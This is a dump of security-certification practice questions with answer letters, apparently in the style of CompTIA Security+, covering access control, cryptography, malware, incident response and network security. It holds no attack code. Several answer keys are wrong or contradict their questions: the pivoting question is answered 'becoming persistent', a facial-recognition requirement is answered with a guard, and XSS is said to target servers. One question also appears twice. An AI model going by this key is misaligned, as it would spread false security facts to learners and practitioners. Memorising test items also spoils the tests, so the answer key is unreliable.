Which of the following threats has sufficient knowledge to cause the MOST danger to an organization? A. Competitors B. Insiders C. Hacktivists D. Script kiddies
B. Insiders
Which of the following should Matt, a security administrator, include when encrypting smartphones? (Select TWO). A. Steganography images B. Internal memory C. Master boot records D. Removable memory cards E. Public keys
B. Internal memory D. Removable memory cards
A software developer is responsible for writing the code on an accounting application. Another software developer is responsible for developing code on a system in human resources. Once a year they have to switch roles for several weeks. Which of the following practices is being implemented? A. Mandatory vacations B. Job rotation C. Least privilege D. Separation of duties
B. Job rotation
A company is looking for an authentication protocol that uses tickets and time stamps to ensure the validity of requests and to prevent replay attacks. Which of the following would be BEST suited to meet this requirement? A. TACACS+ B. Kerberos C. RADIUS D. MSCHAP
B. Kerberos
Which of the following is a security concern regarding users bringing personally-owned devices that they connect to the corporate network? A. Cross-platform compatibility issues between personal devices and server-based applications B. Lack of controls in place to ensure that the devices have the latest system patches and signature files C. Non-corporate devices are more difficult to locate when a user is terminated D. Non-purchased or leased equipment may cause failure during the audits of company-owned assets
B. Lack of controls in place to ensure that the devices have the latest system patches and signature files
Legal authorities notify a company that its network has been compromised for the second time in two years. The investigation shows the attackers were able to use the same vulnerability on different systems in both attacks. Which of the following would have allowed the security team to use historical information to protect against the second attack? A. Key risk indicators B. Lessons learned C. Recovery point objectives D. Tabletop exercise
B. Lessons learned
An analyst is currently looking at the following output: Software Name Status Licensed Used Software 1 Approved 100 91 Software 2 Approved 50 52 Software 3 Approved 100 87 Software 4 Approved 50 46 Software 5 Denied 0 0 Which of the following security issues has been discovered based on the output? A. Insider threat B. License compliance violation C. Unauthorized software D. Misconfigured admin permissions
B. License compliance violation
Which of the following technologies uses multiple devices to share work? A. Switching B. Load balancing C. RAID D. VPN concentrator
B. Load balancing
Which of the following algorithms has well documented collisions? (Select TWO). A. AES B. MD5 C. SHA D. SHA-256 E. RSA
B. MD5 C. SHA
Joe, an employee, was escorted from the company premises due to suspicion of revealing trade secrets to a competitor. Joe had already been working for two hours before leaving the premises. A security technician was asked to prepare a report of files that had changed since last night's integrity scan. Which of the following could the technician use to prepare the report? (Select TWO). A. PGP B. MD5 C. ECC D. AES E. Blowfish F. HMAC
B. MD5 F. HMAC
A security administrator is configuring a RADIUS server for wireless authentication. The configuration must ensure client credentials are encrypted end-to-end between the client and the authenticator. Which of the following protocols should be configured on the RADIUS server? (Select TWO). A. PAP B. MSCHAP C. PEAP D. NTLM E. SAML
B. MSCHAP C. PEAP
Which of the following refers to the term used to restore a system to its operational state? A. MTBF B. MTTR C. RTO D. RPO
B. MTTR
A systems administrator is configuring a system that uses data classification labels. Which of the following will the administrator need to implement to enforce access control? A. Discretionary access control B. Mandatory access control C. Role-based access control D. Rule-based access control
B. Mandatory access control
Pete, an IT Administrator, needs to secure his server room. Which of the following mitigation methods would provide the MOST physical protection? A. Sign in and sign out logs B. Mantrap C. Video surveillance D. HVAC
B. Mantrap
During the information gathering stage of a deploying role-based access control model, which of the following information is MOST likely required? A. Conditional rules under which certain systems may be accessed B. Matrix of job titles with required access privileges C. Clearance levels of all company personnel D. Normal hours of business operation
B. Matrix of job titles with required access privileges
Matt, a security analyst, needs to implement encryption for company data and also prevent theft of company data. Where and how should Matt meet this requirement? A. Matt should implement access control lists and turn on EFS. B. Matt should implement DLP and encrypt the company database. C. Matt should install Truecrypt and encrypt the company server. D. Matt should install TPMs and encrypt the company database.
B. Matt should implement DLP and encrypt the company database.
Which of the following passwords is the LEAST complex? A. MyTrain!45 B. Mytr@in!! C. MyTr@in12 D. MyTr@in#8
B. Mytr@in!!
An encrypted message is sent using PKI from Sara, a client, to a customer. Sara claims she never sent the message. Which of the following aspects of PKI BEST ensures the identity of the sender? A. CRL B. Non-repudiation C. Trust models D. Recovery agents
B. Non-repudiation
Compared to a non-credentialed scan, which of the following is a unique result of a credentialed scan? A. Uncommon open ports on the host B. Outdated software versions on the host C. Self-signed certificate on the host D. Fully qualified domain name
B. Outdated software versions on the host
A security administrator wants to implement least privilege access to a network share that stores sensitive company data. The organization is particularly concerned with the integrity of data, and implements discretionary access control. The following controls are available: Read = A user can read the content of an existing file. Write = A user can modify the content of an existing file and delete an existing file. Create = A user can create a new file and place data with the file. A missing control means the users does not have that access. Which of the following configurations provides the appropriate control to support the organization's requirements? A. Owners: Read, Write, Create Group Members: Read, Write Others: Read, Write B. Owners: Read, Write, Create Group Members: Read, Write, Create Others: Read C. Owners: Read, Write Group Members: Read, Create Others: Read, Create D. Owners: Write, Create Group Members: Read, Create Others: Read, Write, Create
B. Owners: Read, Write, Create Group Members: Read, Write, Create Others: Read
A security manager is creating an account management policy for a global organization with sales personnel who must access corporate network resources while traveling all over the world. Which of the following practices is the security manager MOST likely to enforce with the policy? (Select TWO) A. Time-of-day restrictions B. Password complexity C. Location-based authentication D. Group-based access control E. Standard naming convention
B. Password complexity D. Group-based access control
An administrator discovers that many users have used their same passwords for years even though the network requires that the passwords be changed every six weeks. Which of the following, when used together, would BEST prevent users from reusing their existing password? (Select TWO). A. Length of password B. Password history C. Minimum password age D. Password expiration E. Password complexity F. Non-dictionary words
B. Password history C. Minimum password age
Which of the following assessments would Pete, the security administrator, use to actively test that an application's security controls are in place? A. Code review B. Penetration test C. Protocol analyzer D. Vulnerability scan
B. Penetration test
Which of the following is the BEST approach to perform risk mitigation of user access control rights? A. Conduct surveys and rank the results. B. Perform routine user permission reviews. C. Implement periodic vulnerability scanning. D. Disable user accounts that have not been used within the last two weeks.
B. Perform routine user permission reviews.
The Chief Executive Officer (CEO) has asked a junior technician to create a folder in which the CEO can place sensitive files. The technician later finds the information within these files is the topic of conversation around the company. When this information gets back to the CEO, the technician is called in to explain. Which of the following MOST likely occurred? A. Access violations B. Permission issues C. Data exfiltration D. Certificate issues
B. Permission issues
A third-party penetration testing company was able to successfully use an ARP cache poison technique to gain root access on a server. The tester successfully moved to another server that was not in the original network. Which of the following is the MOST likely method used to gain access to the other host? A. Backdoor B. Pivoting C. Persistence D. Logic bomb
B. Pivoting
In initially conducting a penetration test, you find vulnerabilities on a separate, less secure server on the same network as the one you're investigating. You use access to that server to then attack the target servers. This type of exploit is known as: A. Escalation of privileges B. Pivoting C. Active reconnaissance D. Persistence
B. Pivoting
Due to issues with building keys being duplicated and distributed, a security administrator wishes to change to a different security control regarding a restricted area. The goal is to provide access based upon facial recognition. Which of the following will address this requirement? A. Set up mantraps to avoid tailgating of approved users. B. Place a guard at the entrance to approve access. C. Install a fingerprint scanner at the entrance. D. Implement proximity readers to scan users' badges.
B. Place a guard at the entrance to approve access.
A security engineer is making changes to a corporate network to facilitate the expansion of corporate connectivity to guest users. The security engineer is concerned with unauthorized users accessing sensitive systems that also require network connectivity. Given the engineer's requirements, which of the following is the BEST method of securing the sensitive systems? A. Place the sensitive systems in an isolated VLAN. B. Place an air gap around the sensitive systems. C. Virtualize the guest wireless infrastructure. D. Place the guest WAPs on a honeypot.
B. Place an air gap around the sensitive systems.
A technician is evaluating malware that was found on the enterprise network. After reviewing samples of themalware binaries, the technician finds each has a different hash associated with it. Which of the following types of malware is MOST likely present in the environment? A. Trojan B. Polymorphic worm C. Rootkit D. Logic bomb E. Armored virus
B. Polymorphic worm
During which of the following phases of the Incident Response process should a security administrator define and implement general defense against malware? A. Lessons Learned B. Preparation C. Eradication D. Identification
B. Preparation
A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of users jailbreaking mobile devices? A. Install a corporately monitored mobile antivirus on the devices. B. Prevent the installation of applications from a third-party application store. C. Build a custom ROM that can prevent jailbreaking. D. Require applications to be digitally signed.
B. Prevent the installation of applications from a third-party application store.
After Matt, a user, enters his username and password at the login screen of a web enabled portal, the following appears on his screen: `Please only use letters and numbers on these fields' Which of the following is this an example of? A. Proper error handling B. Proper input validation C. Improper input validation D. Improper error handling
B. Proper input validation
Pete, the system administrator, has blocked users from accessing social media web sites. In addition to protecting company information from being accidentally leaked, which additional security benefit does this provide? A. No competition with the company's official social presence B. Protection against malware introduced by banner ads C. Increased user productivity based upon fewer distractions D. Elimination of risks caused by unauthorized P2P file sharing
B. Protection against malware introduced by banner ads
Matt, an administrator, notices a flood fragmented packet and retransmits from an email server. After disabling the TCP offload setting on the NIC, Matt sees normal traffic with packets flowing in sequence again. Which of the following utilities was he MOST likely using to view this issue? A. Spam filter B. Protocol analyzer C. Web application firewall D. Load balancer
B. Protocol analyzer
A systems administrator wants to generate a self-signed certificate for an internal website. Which of the following steps should the systems administrator complete prior to installing the certificate on the server? A. Provide the private key to a public CA. B. Provide the public key to the internal CA. C. Provide the public key to a public CA. D. Provide the private key to the internal CA. E. Provide the public/private key pair to the internal CA. F. Provide the public/private key pair to a public CA.
B. Provide the public key to the internal CA.
A user was reissued a smart card after the previous smart card had expired. The user is able to log into the domain but is now unable to send digitally signed or encrypted email. Which of the following would the user need to perform? A. Remove all previous smart card certificates from the local certificate store. B. Publish the new certificates to the global address list. C. Make the certificates available to the operating system. D. Recover the previous smart card certificates.
B. Publish the new certificates to the global address list.
Multiple organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations. Which of the following should be implemented if all the organizations use the native 802.1x client on their mobile devices? A. Shibboleth B. RADIUS federation C. SAML D. OAuth E. OpenlD connect
B. RADIUS federation
Matt, a security consultant, has been tasked with increasing server fault tolerance and has been given no budget to accomplish his task. Which of the following can Matt implement to ensure servers will withstand hardware failure? A. Hardware load balancing B. RAID C. A cold site D. A host standby
B. RAID
Which of the following may significantly reduce data loss if multiple drives fail at the same time? A. Virtualization B. RAID C. Load balancing D. Server clustering
B. RAID
Which of the following ciphers would be BEST used to encrypt streaming video? A. RSA B. RC4 C. SHA1 D. 3DES
B. RC4
Which of the following is used to encrypt web application data? A. RSA B. RC4 C. SHA D. DHA
B. RC4
While browsing an external website, a human resources manager opens several links in new browser tabs to review later. After browsing for 20 minutes, a full-screen message appears in a completely new browser window with a critical error code and a help desk number to call. At the same time, an audio message plays over the laptop speaker, describing a critical error and warning that the IP address of the laptop will be locked until the critical issue is resolved. The human resources manager is unable to escape out of the error message, and the keyboard is not responsive. After alerting the security team, the human resources manager held down the power button to turn off the laptop and then power it back on which rectifies the issue. Which of the following BEST describes the type of attack the human resources manager is experiencing? A. Spyware B. Ransomware C. Adware D. Logic bomb
B. Ransomware
A bank has recently deployed mobile tablets to all loan officers for use at customer sites. Which of the following would BEST prevent the disclosure of customer data in the event that a tablet is lost or stolen? A. Application control B. Remote wiping C. GPS D. Screen-locks
B. Remote wiping
When attempting to secure a mobile workstation, which of the following authentication technologies rely on the user's physical characteristics? (Select TWO) A. MAC address table B. Retina scan C. Fingerprint scan D. Two-factor authentication E. CAPTCHA F. Password string
B. Retina scan C. Fingerprint scan
When attempting to secure a mobile workstation, which of the following authentication technologies rely on the user's physical characteristics? (Select TWO) A. MAC address table B. Retina scan C. Fingerprint scan D. Two-factor authentication E. CAPTCHA F. Password string
B. Retina scan C. Fingerprint scan
A system security analyst using an enterprise monitoring tool notices an unknown internal host exfiltrating files to several foreign IP addresses. Which of the following would be an appropriate mitigation technique? A. Disabling unnecessary accounts B. Rogue machine detection C. Encrypting sensitive files D. Implementing antivirus
B. Rogue machine detection
A security administrator is analyzing a user report in which the computer exhibits odd network-related outages. The administrator, however, does not see any suspicious processes running. A prior technician's notes indicate the machine has been remediated twice, but the system still exhibits odd behavior. Files were deleted from the system recently. Which of the following is the MOST likely cause of this behavior. A. Crypto-malware B. Rootkit C. Logic bomb D. Session hijacking
B. Rootkit
An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned network can be seen sending packets to the wrong gateway. Which of the following network devices is misconfigured and which of the following should be done to remediate the issue? A. Firewall; implement an ACL on the interface B. Router; place the correct subnet on the interface C. Switch; modify the access port to trunk port D. Proxy; add the correct transparent interface
B. Router; place the correct subnet on the interface
Which of the following is an XML based open standard used in the exchange of authentication and authorization information between different parties? A. LDAP B. SAML C. TACACS+ D. Kerberos
B. SAML
As part of a corporate merger, two companies are combining resources. As a result, they must transfer files through the internet in a secure manner. Which of the following protocols would BEST meet this objective? (Select Two) A. LDAPS B. SFTP C. HTTPS D. DNSSEC E. SRTP
B. SFTP C. HTTPS
A recent vulnerability scan found that Telnet is enabled on all network devices. Which of the following protocols should be used instead of Telnet? A. SCP B. SSH C. SFTP D. SSL
B. SSH
A manager wants to distribute a report to several other managers within the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (Select THREE) A. S/MIME B. SSH C. SNMPv3 D. FTPS E. SRTP F. HTTPS G. LDAPS
B. SSH D. FTPS F. HTTPS
An achievement in providing worldwide Internet security was the signing of certificates associated with which of the following protocols? A. TCP/IP B. SSL C. SCP D. SSH
B. SSL
Which of the following can use RC4 for encryption? (Select TWO). A. CHAP B. SSL C. WEP D. AES E. 3DES
B. SSL C. WEP
A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized. Which of the following solutions would BEST meet these requirements? (Select TWO) A. Multifactor authentication B. SSO C. Biometrics D. PKI E. Federation
B. SSO E. Federation
Which of the following is a random value appended to a credential that makes the credential less susceptible to compromise when hashed? A. Nonce B. Salt C. OTP D. Block cipher E. IV
B. Salt
Which of the following is a deployment concept that can be used to ensure only the required OS access is exposed to software applications? A. Staging environment B. Sandboxing C. Secure baseline D. Trusted OS
B. Sandboxing
A consumer purchases an exploit from the dark web. The exploit targets the online shopping cart of popular website, allowing the shopper to modify the price of an item at checkout. Which of the following BEST describes this type of user? A. Insider B. Script kiddie C. Competitor D. Hacktivist E. APT
B. Script kiddie
The Chief Technical Officer (CTO) has been informed of a potential fraud committed by a database administrator performing several other job functions within the company. Which of the following is the BEST method to prevent such activities in the future? A. Job rotation B. Separation of duties C. Mandatory Vacations D. Least Privilege
B. Separation of duties
A security analyst is securing a PACS. One of the requirements is network isolation with no access to the Internet or networked computers. Given this scenario, which of the following should the analyst implement to BEST address this requirement? A. Set up a firewall rule blocking ports 80 and 443. B. Set up an air-gapped environment. C. Set up a router and configure an ACL. D. Set up a segmented VLAN.
B. Set up an air-gapped environment.
An organization's employees currently use three different sets of credentials to access multiple internal resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal? A. Transitive trust B. Single sign-on C. Federation D. Secure token
B. Single sign-on
When used together, which of the following qualify as two-factor authentication? A. Password and PIN B. Smart card and PIN C. Proximity card and smart card D. Fingerprint scanner and iris scanner
B. Smart card and PIN
An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks is described? A. Replay B. Spoofing C. DNS poisoning D. Client-side attack
B. Spoofing
A system administrator is using a packet sniffer to troubleshoot remote authentication. The administrator detects a device trying to communicate to TCP port 49. Which of the following authentication methods is MOST likely being attempted? A. RADIUS B. TACACS+ C. Kerberos D. LDAP
B. TACACS+
A systems administrator has implemented multiple websites using host headers on the same server. The server hosts two websites that require encryption and other websites where encryption is optional. Which of the following should the administrator implement to encrypt web traffic for the required websites? A. Extended domain validation B. TLS host certificate C. OCSP stapling D. Wildcard certificate
B. TLS host certificate
A security technician has been asked to recommend an authentication mechanism that will allow users to authenticate using a password that will only be valid for a predefined time interval. Which of the following should the security technician recommend? A. CHAP B. TOTP C. HOTP D. PAP
B. TOTP
Pete, a security analyst, has been informed that the development team has plans to develop an application which does not meet the company's password policy. Which of the following should Pete do NEXT? A. Contact the Chief Information Officer and ask them to change the company password policy so that the application is made compliant. B. Tell the application development manager to code the application to adhere to the company's password policy. C. Ask the application development manager to submit a risk acceptance memo so that the issue can be documented. D. Inform the Chief Information Officer of non-adherence to the security policy so that the developers can be reprimanded.
B. Tell the application development manager to code the application to adhere to the company's password policy.
A network administrator is downloading the latest software for the organization's core switch. The downloads page allows users to view the checksum values for the available files. The network administrator is shows the following when viewing the checksum values for the TB_16.swi.file: Checksum values for the downloaded file: MD5 d50b2b04cfb168eec8 SHA1 6a49065705a43de83dfa9e94 SHA256 7123fb644fbabdda6a73f6e6bc833e2cf12 After downloading the file, the network administrator runs a command to show the following output: Algorithm Hash Patch SHA256 5fdbbfb644fbabdda000006e6bc833e2c968 C:\Users\bsmith\TB_16.swi SHA256 64ccbfbaf4fb96dda6a7373e9bcf62e3c244 C:\Users\bsmith\AA_15.swi SHA1 12fec6aabc9ce87fee654abc C:\Users\bsmith\KB_09.swi MD5 5fdbbfb644fbadda6 C:\Users\bsmith\KA_01.swi Which of the following can be determined from the above output? A. The download file was only hashed with SHA-256. B. The download file has been corrupted or tampered with. C. The download file should not be used because it was not hashed with MD5. D. The download file should not be used because its hash differs from the hash of AA_15.swi
B. The download file has been corrupted or tampered with.
A technician receives a device with the following anomalies: Frequent pop-up ads Slow response-time switching between active programs Unresponsive peripherals The technician reviews the following log file entries: File Name Source MD5 Target MD5 Status antivirus.exe F794F21CD33E4F57890DDEA5CF267ED2 F794F21CD33E4F57890DDEA5CF267ED2 Automatic iexplore.exe 7FAAF21CD33E4F57890DDEA5CF29CCEA AA87F21CD33E4F57890DDEAEE2197333 Automatic service.exe 77FF390CD33E4F57890DDEA5CF28881F 77FF390CD33E4F57890DDEA5CF28881F Manual USB.exe E289F21CD33E4F57890DDEA5CF28EDC0 E289F21CD33E4F57890DDEA5CF28EDC0 Stopped Based on the above output, which of the following should be reviewed? A. The web application firewall B. The file integrity check C. The data execution prevention D. The removable media control
B. The file integrity check
A security administrator has found a hash in the environment known to belong to malware. The administrator then finds this file to be in the preupdate area of the OS, which indicated it was pushed from the central patch system. File: winx86_adobe_flash_upgrade.exe Hash: 99ac28bede43ab869b853ba62c4ea243 Administrator pulls a report from the patch management system with the following output: Install Date Package Name Target Device Hash 10/10/2017 java_11.2_x64.exe HQ PC's 01ab28bbde63aa879b35bba62cdea282 10/10/2017 winx86_adobe_flash_upgrade.exe HQ PC's 99ac28bede43ab86b853ba62c4ea243 Given the above output, which of the following MOST likely happened? A. The file was corrupted after it left the patch system B. The file was infected when the patch manager downloaded it C. The file was not approved in the application whitelist system D. The file was embedded with a logic bomb to evade detection
B. The file was infected when the patch manager downloaded it
A developer wants to use an open source, third-party plug-in. The developer downloads the plug-in from the provider's website and from a mirror site that runs the files through an integrity-checking hash. The output of each file is shown below: fileA: BA411c782AD521740123456789ABCDEF fileB: BA411c782AD521740123456789ABCDEF Which of the following statements BEST summarizes what conclusion the developer can draw from the above results? A. The files have both been compromised because the numeric and letter sequence indicates an error. B. The integrity checksum is MD5 and cannot be assumed reliable. C. Given the output, the developer can assume there is no integrity compromise. D. The MD5 and SHA-1 checksums match, so the files have not been compromised.
B. The integrity checksum is MD5 and cannot be assumed reliable.
Due to regulatory requirements, servers in a global organization must use time synchronization. Which of the following represents the MOST secure method of time synchronization? A. The server should connect to external Stratum 0 NTP servers for synchronization B. The server should connect to internal Stratum 0 NTP servers for synchronization C. The server should connect to external Stratum 1 NTP servers for synchronization D. The server should connect to internal Stratum 1 NTP servers for synchronization
B. The server should connect to internal Stratum 0 NTP servers for synchronization
A security audit identifies a number of large email messages being sent by a specific user from their company email account to another address external to the company. These messages were sent prior to a company data breach, which prompted the security audit. The user was one of a few people who had access to the leaked data. Review of the suspect's emails show they consist mostly of pictures of the user at various locations during a recent vacation. No suspicious activities from other users who have access to the data were discovered. Which of the following is occurring? A. The user is encrypting the data in the outgoing messages. B. The user is using steganography. C. The user is spamming to obfuscate the activity. D. The user is using hashing to embed data in the emails.
B. The user is using steganography.
A corporation is concerned that, if a mobile device is lost, any sensitive information on the device could be accessed by third parties. Which of the following would BEST prevent this from happening? A. Initiate remote wiping on lost mobile devices. B. Use FDE and require PINs on all mobile devices. C. Use geolocation to track lost devices. D. Require biometric logins on all mobile devices.
B. Use FDE and require PINs on all mobile devices.
A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details: Certificate 1 Certificate Path: Geotrust Global CA *company.com Certificate 2 Certificate Path: *company.com Which of the following would resolve the problem? A. Use a wildcard certificate. B. Use certificate chaining. C. Use a trust model. D. Use an extended validation certificate.
B. Use certificate chaining.
Datacenter employees have been battling alarms in a datacenter that has been experiencing hotter than normal temperatures. The server racks are designed so all 48 rack units are in use, and servers are installed in any manner in which the technician can get them installed. Which of the following practices would BEST alleviate the heat issues and keep costs low? A. Utilize exhaust fans. B. Use hot and cold aisles. C. Airgap the racks. D. Use a secondary AC unit.
B. Use hot and cold aisles.
A network engineer is setting up a network for a company. There is a BYOD policy for the employees so that they can connect their laptops and mobile devices. Which of the following technologies should be employed to separate the administrative network from the network in which all of the employees' devices are connected? A. VPN B. VLAN C. WPA2 D. MAC filtering
B. VLAN
A security administrator wants to perform routine tests on the network during working hours when certain applications are being accessed by the most people. Which of the following would allow the security administrator to test the lack of security controls for those applications with the least impact to the system? A. Penetration test B. Vulnerability scan C. Load testing D. Port scanner
B. Vulnerability scan
A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production. Which of the following development methodologies is the team MOST likely using now? A. Agile B. Waterfall C. Scrum D. Spiral
B. Waterfall
Which of the following is a major difference between XSS attacks and remote code exploits? A. XSS attacks use machine language, while remote exploits use interpreted language. B. XSS attacks target servers, while remote code exploits target clients. C. Remote code exploits aim to escalate attackers' privileges, while XSS attacks aim to gain access only. D. Remote code exploits allow writing code at the client side and executing it, while XSS attacks require no code to work.
B. XSS attacks target servers, while remote code exploits target clients.
An administrator wants to establish a WiFi network using a high gain directional antenna with a narrow radiation pattern to connect two buildings separated by a very long distance. Which of the following antennas would be BEST for this situation? A. Dipole B. Yagi C. Sector D. Omni
B. Yagi
A public announcement is made about a newly discovered, rapidly spreading virus.The security team immediately updates and applies all its antivirus signatures. The security manager contacts the antivirus vendor support team to ask why one of the systems was infected. The vendor support team explains that a signature update is not available for this virus yet. Which of the following BEST describes this situation? A. Race condition B. Zero day C. Lack of vendor support D. Untrained users
B. Zero day
A security analyst, Ann, is reviewing an IRC channel and notices that a malicious exploit has been created for a frequently used application. She notifies the software vendor and asks them for remediation steps, but is alarmed to find that no patches are available to mitigate this vulnerability. Which of the following BEST describes this exploit? A. Malicious insider threat B. Zero-day C. Client-side attack D. Malicious add-on
B. Zero-day
Using a heuristic system to detect an anomaly in a computer's baseline, a system administrator was able to detect an attack even though the company signature based IDS and antivirus did not detect it. Further analysis revealed that the attacker had downloaded an executable file onto the company PC from the USB port, and executed it to trigger a privilege escalation flaw. Which of the following attacks has MOST likely occurred? A. Cookie stealing B. Zero-day C. Directory traversal D. XML injection
B. Zero-day
When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said that they are: A. escalating privilege B. becoming persistent C. fingerprinting D. pivoting
B. becoming persistent
A company policy regarding the shredding of proprietary documents is MOST likely designed to prevent: A. impersonation B. dumpster diving C. piggybacking D. identity theft
B. dumpster diving
Vendor diversity is considered an architectural best practice because: A. it prevents vulnerabilities from spreading from device to device in a crisis. B. it mitigates the risk of a programming flaw affecting the entire architecture. C. it allows for more user training to be conducted on different equipment. D. it transfers the risk associated with vulnerable devices to multiple vendors.
B. it mitigates the risk of a programming flaw affecting the entire architecture.
An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently has 500 PCs active on the network. the Chief Information Security Officer (CISO) suggests that the organization employ desktop imaging technology for such a large scale upgrade. Which of the following is a security benefit of implementing an imaging solution? A. it allows for faster deployment B. it provides a consistent baseline C. It reduces the number of vulnerabilities D. It decreases the boot time
B. it provides a consistent baseline
A malicious person gained access to a datacenter by ripping the proximity badge reader off the wall near the datacenter entrance. This caused the electronic locks on the datacenter door to release because the: A. badge reader was improperly installed. B. system was designed to fail open for life-safety. C. system was installed in a fail closed configuration. D. system used magnetic locks and the locks became demagnetized.
B. system was designed to fail open for life-safety.
Alex is conduct forensics of a phishing email. She knows the IP address of the originating email server. What command would show Alex the compete path to that IP address? A. ping B. tracert C. netstat D. nslookup
B. tracert
In which of the following scenarios is PKI LEAST hardened? A. The CRL is posted to a publicly accessible location. B. The recorded time offsets are developed with symmetric keys. C. A malicious CA certificate is loaded on all the clients. D. All public keys are accessed by an unauthorized user.
C. A malicious CA certificate is loaded on all the clients.
A security administrator needs to configure remote access to a file share so it can only be accessed between the hours of 9:00 a.m. and 5:00 p.m. Files in the share can only be accessed by members of the same department as the data owner. Users should only be able to create files with approved extensions, which may differ by department. Which of the following access controls would be the MOST appropriate for this situation? A. RBAC B. MAC C. ABAC D. DAC
C. ABAC
An organization's Chief Executive Officer (CEO) directs a newly hired computer technician to install an OS on the CEO's personal laptop. The technician performs the installation, and a software audit later in the month indicates a violation of the EULA occurred as a result. Which of the following would address this violation going forward? A. Security configuration baseline B. Separation of duties C. AUP D. NDA
C. AUP
A penetration tester harvests potential usernames from a social networking site. The penetration tester then uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on a network server. Which of the following methods is the penetration tester MOST likely using? A. Escalation of privilege B. SQL injection C. Active reconnaissance D. Proxy server
C. Active reconnaissance
Several employees submit the same phishing email to the administrator. The administrator finds that the links in the email are not being blocked by the company's security device. Which of the following might the administrator do in the short term to prevent the emails from being received? A. Configure an ACL B. Implement a URL filter C. Add the domain to a block list D. Enable TLS on the mail server
C. Add the domain to a block list
When sending messages using symmetric encryption, which of the following must happen FIRST? A. Exchange encryption key B. Establish digital signatures C. Agree on an encryption method D. Install digital certificates
C. Agree on an encryption method
A vice president at a manufacturing organization is concerned about desktops being connected to the network. Employees need to log onto the desktops' local account to verify that a product is being created within specifications; otherwise, the desktops should be as isolated as possible. Which of the following is the BEST way to accomplish this? A. Put the desktops in the DMZ. B. Create a separate VLAN for the desktops. C. Air gap the desktops. D. Join the desktops to an ad-hoc network.
C. Air gap the desktops.
A member of the admins group reports being unable to modify the "changes" file on a server. The permissions on the file are as follows: Permissions User Group File -rwxrw-r--+ Admins Admins changes Based on the output above, which of the following BEST explains why the user is unable to modify the "changes" file? A. The SELinux mode on the server is set to "enforcing." B. The SELinux mode on the server is set to "permissive." C. An FACL has been added to the permissions for the file. D. The admins group does not have adequate permissions to access the file.
C. An FACL has been added to the permissions for the file.
A network administrator is responsible for securing applications against external attacks. Every month, the underlying operating system is updated. There is no process in place for other software updates. Which of the following processes could MOST effectively mitigate these risks? A. Application hardening B. Application change management C. Application patch management D. Application firewall review
C. Application patch management
Which of the following is the BEST way for home users to mitigate vulnerabilities associated with IoT devices on their home network? A. Power off the devices when they are not in use B. Prevent IoT devices from contacting the Internet directly C. Apply firmware and software updates upon availability D. Deploy a bastion host on the home network
C. Apply firmware and software updates upon availability
A security analyst is reviewing the following company requirements prior to selecting the appropriate technical control configuration parameter: RTO: 2 days RPO: 36 hours MTTR: 24 hours MTBF: 60 days Which of the following solutions will address the RPO requirements? A. Remote Syslog facility collecting real-time events B. Server farm behind a load balancer delivering five-nines uptime C. Backup solution that implements daily snapshots D. Cloud environment distributed across geographic regions
C. Backup solution that implements daily snapshots
A company has a data classification system with definitions for "Private" and "Public". the company's security policy outlines how data should be protected based on type. The company recently added data type "Proprietary". Which of the following is the MOST likely reason the company added this data type? A. Reduced cost B. More searchable data C. Better data classification D. Expanded authority of the privacy officer
C. Better data classification
A company has noticed multiple instances of proprietary information on public websites. It has also observed an increase in the number of email messages sent to random employees containing malicious links and PDFs. Which of the following changes should the company make to reduce the risks associated with phishing attacks? (Select TWO) A. Install an additional firewall B. Implement a redundant email server C. Block access to personal email on corporate systems D. Update the X.509 certificates on the corporate email server E. Update corporate policy to prohibit access to social media websites F. Review access violation on the file server
C. Block access to personal email on corporate systems E. Update corporate policy to prohibit access to social media websites
Which of the following can be used by a security administrator to successfully recover a user's forgotten password on a password protected file? A. Cognitive password B. Password sniffing C. Brute force D. Social engineering
C. Brute force
A developer has incorporated routines into the source code for controlling the length of the input passed to the program. Which of the following types of vulnerabilities is the developer protecting the code against? A. DLL injection B. Memory leak C. Buffer overflow D. Pointer dereference
C. Buffer overflow
A malicious individual is attempting to write too much data to an application's memory. Which of the following describes this type of attack? A. Zero-day B. SQL injection C. Buffer overflow D. XSRF
C. Buffer overflow
An application developer has neglected to include input validation checks in the design of the company's new web application. An employee discovers that repeatedly submitting large amounts of data, including custom code, to an application will allow the execution of the custom code at the administrator level. Which of the following BEST identifies this application attack? A. Cross-site scripting B. Clickjacking C. Buffer overflow D. Replay
C. Buffer overflow
Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS? A. Pivoting B. Process affinity C. Buffer overflow D. XSS
C. Buffer overflow
Which of the following MUST be updated immediately when an employee is terminated to prevent unauthorized access? A. Registration B. CA C. CRL D. Recovery agent
C. CRL
Which of the following should Jane, a security administrator, perform before a hard drive is analyzed with forensics tools? A. Identify user habits B. Disconnect system from network C. Capture system image D. Interview witnesses
C. Capture system image
The IT department is deploying new computers. To ease the transition, users will be allowed to access their old and new systems. The help desk is receiving reports that users are experiencing the following error when attempting to log in to their previous system: Logon Failure: Access Denied Which of the following can cause this issue? A. Permission issues B. Access violations C. Certificate issues D. Misconfigured devices
C. Certificate issues
An organization was recently compromised by an attacker who used a server certificate with the company's domain issued by an irreputable CA. Which of the following should be used to mitigate this risk in the future? A. OCSP B. DNSSEC C. Certificate pinning D. Key escrow
C. Certificate pinning
A compromised workstation utilized in a Distributed Denial of Service (DDOS) attack has been removed from the network and an image of the hard drive has been created. However, the system administrator stated that the system was left unattended for several hours before the image was created. In the event of a court case, which of the following is likely to be an issue with this incident? A. Eye Witness B. Data Analysis of the hard drive C. Chain of custody D. Expert Witness
C. Chain of custody
Which of the following mitigation strategies is established to reduce risk when performing updates to business critical systems? A. Incident management B. Server clustering C. Change management D. Forensic analysis
C. Change management
